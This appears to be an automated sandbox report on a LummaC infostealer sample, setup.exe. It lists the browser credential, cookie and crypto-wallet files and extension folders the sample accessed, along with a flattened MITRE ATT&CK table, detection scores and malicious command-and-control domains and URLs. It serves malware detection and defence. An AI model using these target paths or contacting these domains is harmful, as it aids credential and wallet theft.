              Source: setup.exe, 00000000.00000003.1942277987.0000000001284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: setup.exe, 00000000.00000003.1942277987.0000000001284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: setup.exe, 00000000.00000003.1942277987.0000000001284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Infostealer behavior detected
              Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7468, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		3
              Obfuscated Files or Information              		1
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol51
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading              		Security Account Manager11
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Input Capture              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
              Virtualization/Sandbox Evasion              		NTDS35
              System Information Discovery              		Distributed Component Object Model2
              Clipboard Data              		114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Access Token Manipulation              		LSA Secrets251
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              setup.exe13%ReversingLabsWin32.Malware.Generic
              setup.exe10%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://regularlavhis.click/VISc100%Avira URL Cloudmalware
              http://crl.microsoft6a0%Avira URL Cloudsafe
              https://regularlavhis.click/Mi100%Avira URL Cloudmalware
              https://regularlavhis.click/bu100%Avira URL Cloudmalware
              https://regularlavhis.click/api$100%Avira URL Cloudmalware
              https://regularlavhis.click/api100%Avira URL Cloudmalware
              https://regularlavhis.click/piGW100%Avira URL Cloudmalware
              https://regularlavhis.click/Y100%Avira URL Cloudmalware
              https://regularlavhis.click/jh100%Avira URL Cloudmalware
              https://regularlavhis.click/ob100%Avira URL Cloudmalware
              https://regularlavhis.click/apih100%Avira URL Cloudmalware
              https://regularlavhis.click/bub100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txtf1100%Avira URL Cloudmalware
              https://regularlavhis.click/pi:100%Avira URL Cloudmalware
              https://regularlavhis.click/la100%Avira URL Cloudmalware
              https://regularlavhis.click/laK100%Avira URL Cloudmalware
              https://regularlavhis.click/pi100%Avira URL Cloudmalware
              regularlavhis.click100%Avira URL Cloudmalware
              https://regularlavhis.click/Mi6a100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtebKit/537.36100%Avira URL Cloudmalware
              http://multicommander.com/updates/version.xml0%Avira URL Cloudsafe
              https://regularlavhis.click/apiP100%Avira URL Cloudmalware
              https://regularlavhis.click/100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtk100%Avira URL Cloudmalware
              https://cegu.shop/2100%Avira URL Cloudmalware
              https://regularlavhis.click/jhP100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                regularlavhis.click
                		104.21.96.1
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://regularlavhis.click/apitrue
                  • Avira URL Cloud: malware
                  		unknown
                  rabidcowse.shopfalse
                    		high
                    wholersorie.shopfalse
                      		high
                      regularlavhis.clicktrue
                      • Avira URL Cloud: malware
                      		unknown
                      cloudewahsj.shopfalse
                        		high
                        noisycuttej.shopfalse
                          		high
                          nearycrepso.shopfalse
                            		high
                            https://cegu.shop/8574262446/ph.txtfalse
                              		high
                              framekgirus.shopfalse
                                		high
                                tirepublicerj.shopfalse
                                  		high
                                  abruptyopsn.shopfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
